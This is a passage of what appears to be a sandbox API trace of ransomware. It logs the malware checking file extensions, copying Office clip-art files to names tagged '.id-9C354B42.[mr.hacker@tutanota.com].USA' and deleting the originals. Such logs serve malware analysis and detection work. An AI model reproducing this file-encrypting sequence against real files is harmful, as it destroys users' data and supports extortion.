returned 4 [0267.595] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.595] lstrlenW (lpString=".xlsx") returned 5 [0267.595] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1 [0267.595] lstrlenW (lpString=".ppt") returned 4 [0267.595] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.595] lstrlenW (lpString=".zip") returned 4 [0267.595] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.595] lstrlenW (lpString=".rar") returned 4 [0267.595] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.595] lstrlenW (lpString=".bz2") returned 4 [0267.595] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.595] lstrlenW (lpString=".7z") returned 3 [0267.595] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.595] lstrlenW (lpString=".dbf") returned 4 [0267.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.595] lstrlenW (lpString=".1cd") returned 4 [0267.595] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.595] lstrlenW (lpString=".jpg") returned 4 [0267.595] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.596] lstrlenW (lpString=".doc") returned 4 [0267.596] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.596] lstrlenW (lpString=".docx") returned 5 [0267.596] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1 [0267.596] lstrlenW (lpString=".pdf") returned 4 [0267.596] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.596] lstrlenW (lpString=".xls") returned 4 [0267.596] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.596] lstrlenW (lpString=".xlsx") returned 5 [0267.596] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1 [0267.596] lstrlenW (lpString=".ppt") returned 4 [0267.596] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.596] lstrlenW (lpString=".zip") returned 4 [0267.596] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.596] lstrlenW (lpString=".rar") returned 4 [0267.596] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.596] lstrlenW (lpString=".bz2") returned 4 [0267.596] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.596] lstrlenW (lpString=".7z") returned 3 [0267.596] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.596] lstrlenW (lpString=".dbf") returned 4 [0267.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.597] lstrlenW (lpString=".1cd") returned 4 [0267.597] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.597] lstrlenW (lpString=".jpg") returned 4 [0267.597] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.597] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.597] lstrlenW (lpString="CRANINST.WMF") returned 12 [0267.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.598] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=49546) returned 1 [0267.598] CloseHandle (hObject=0x328) returned 1 [0267.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf")) returned 0x20 [0267.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.599] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.599] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.599] GetLastError () returned 0x0 [0267.599] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xc18a, lpOverlapped=0x0) returned 1 [0267.601] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xc190, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xc190, lpOverlapped=0x0) returned 1 [0267.760] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.760] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.760] SetEndOfFile (hFile=0x2bc) returned 1 [0267.760] CloseHandle (hObject=0x2bc) returned 1 [0267.760] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.760] SetEndOfFile (hFile=0x328) returned 1 [0267.764] CloseHandle (hObject=0x328) returned 1 [0267.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.056] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf")) returned 1 [0268.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.197] lstrlenW (lpString=".doc") returned 4 [0268.197] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.197] lstrlenW (lpString=".docx") returned 5 [0268.197] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0268.197] lstrlenW (lpString=".pdf") returned 4 [0268.197] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.197] lstrlenW (lpString=".xls") returned 4 [0268.197] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.197] lstrlenW (lpString=".xlsx") returned 5 [0268.197] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0268.197] lstrlenW (lpString=".ppt") returned 4 [0268.197] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.197] lstrlenW (lpString=".zip") returned 4 [0268.197] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.197] lstrlenW (lpString=".rar") returned 4 [0268.197] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.197] lstrlenW (lpString=".bz2") returned 4 [0268.197] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.197] lstrlenW (lpString=".7z") returned 3 [0268.197] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.198] lstrlenW (lpString=".dbf") returned 4 [0268.198] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.198] lstrlenW (lpString=".1cd") returned 4 [0268.198] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.198] lstrlenW (lpString=".jpg") returned 4 [0268.198] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.198] lstrlenW (lpString=".doc") returned 4 [0268.198] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.198] lstrlenW (lpString=".docx") returned 5 [0268.198] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0268.198] lstrlenW (lpString=".pdf") returned 4 [0268.198] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.198] lstrlenW (lpString=".xls") returned 4 [0268.198] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.198] lstrlenW (lpString=".xlsx") returned 5 [0268.198] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0268.198] lstrlenW (lpString=".ppt") returned 4 [0268.198] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.198] lstrlenW (lpString=".zip") returned 4 [0268.198] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.198] lstrlenW (lpString=".rar") returned 4 [0268.198] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.198] lstrlenW (lpString=".bz2") returned 4 [0268.198] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.199] lstrlenW (lpString=".7z") returned 3 [0268.199] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.199] lstrlenW (lpString=".dbf") returned 4 [0268.199] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.199] lstrlenW (lpString=".1cd") returned 4 [0268.199] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0268.199] lstrlenW (lpString=".jpg") returned 4 [0268.199] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.199] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.199] lstrlenW (lpString="DD00234_.WMF") returned 12 [0268.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.199] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=29628) returned 1 [0268.200] CloseHandle (hObject=0x384) returned 1 [0268.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf")) returned 0x20 [0268.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.241] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.241] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.241] GetLastError () returned 0x0 [0268.241] ReadFile (in: hFile=0x348, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x73bc, lpOverlapped=0x0) returned 1 [0268.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x73c0, lpOverlapped=0x0) returned 1 [0268.249] ReadFile (in: hFile=0x348, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.249] SetEndOfFile (hFile=0x2b4) returned 1 [0268.257] CloseHandle (hObject=0x2b4) returned 1 [0268.257] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.257] SetEndOfFile (hFile=0x348) returned 1 [0268.260] CloseHandle (hObject=0x348) returned 1 [0268.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.371] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf")) returned 1 [0268.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.442] lstrlenW (lpString=".doc") returned 4 [0268.442] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.442] lstrlenW (lpString=".docx") returned 5 [0268.442] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.442] lstrlenW (lpString=".pdf") returned 4 [0268.442] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.442] lstrlenW (lpString=".xls") returned 4 [0268.443] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.443] lstrlenW (lpString=".xlsx") returned 5 [0268.443] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.443] lstrlenW (lpString=".ppt") returned 4 [0268.443] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.443] lstrlenW (lpString=".zip") returned 4 [0268.443] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.443] lstrlenW (lpString=".rar") returned 4 [0268.443] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.443] lstrlenW (lpString=".bz2") returned 4 [0268.443] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.443] lstrlenW (lpString=".7z") returned 3 [0268.443] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.443] lstrlenW (lpString=".dbf") returned 4 [0268.443] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.443] lstrlenW (lpString=".1cd") returned 4 [0268.443] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.443] lstrlenW (lpString=".jpg") returned 4 [0268.443] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.443] lstrlenW (lpString=".doc") returned 4 [0268.443] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.443] lstrlenW (lpString=".docx") returned 5 [0268.443] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.444] lstrlenW (lpString=".pdf") returned 4 [0268.444] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.444] lstrlenW (lpString=".xls") returned 4 [0268.444] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.444] lstrlenW (lpString=".xlsx") returned 5 [0268.444] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.444] lstrlenW (lpString=".ppt") returned 4 [0268.444] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.444] lstrlenW (lpString=".zip") returned 4 [0268.444] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.444] lstrlenW (lpString=".rar") returned 4 [0268.444] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.444] lstrlenW (lpString=".bz2") returned 4 [0268.444] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.444] lstrlenW (lpString=".7z") returned 3 [0268.444] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.444] lstrlenW (lpString=".dbf") returned 4 [0268.444] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.444] lstrlenW (lpString=".1cd") returned 4 [0268.444] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0268.444] lstrlenW (lpString=".jpg") returned 4 [0268.444] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.445] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.445] lstrlenW (lpString="DD00414_.WMF") returned 12 [0268.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0268.445] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=42908) returned 1 [0268.445] CloseHandle (hObject=0x39c) returned 1 [0268.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf")) returned 0x20 [0268.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0268.445] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.445] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0268.446] GetLastError () returned 0x0 [0268.446] ReadFile (in: hFile=0x39c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xa79c, lpOverlapped=0x0) returned 1 [0268.453] WriteFile (in: hFile=0x3a0, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xa7a0, lpOverlapped=0x0) returned 1 [0268.455] ReadFile (in: hFile=0x39c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.455] WriteFile (in: hFile=0x3a0, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.455] SetEndOfFile (hFile=0x3a0) returned 1 [0268.457] CloseHandle (hObject=0x3a0) returned 1 [0268.457] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.458] SetEndOfFile (hFile=0x39c) returned 1 [0268.460] CloseHandle (hObject=0x39c) returned 1 [0268.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.471] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf")) returned 1 [0268.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.688] lstrlenW (lpString=".doc") returned 4 [0268.688] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.688] lstrlenW (lpString=".docx") returned 5 [0268.688] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.688] lstrlenW (lpString=".pdf") returned 4 [0268.688] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.688] lstrlenW (lpString=".xls") returned 4 [0268.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.688] lstrlenW (lpString=".xlsx") returned 5 [0268.688] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.688] lstrlenW (lpString=".ppt") returned 4 [0268.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.688] lstrlenW (lpString=".zip") returned 4 [0268.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.688] lstrlenW (lpString=".rar") returned 4 [0268.689] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.689] lstrlenW (lpString=".bz2") 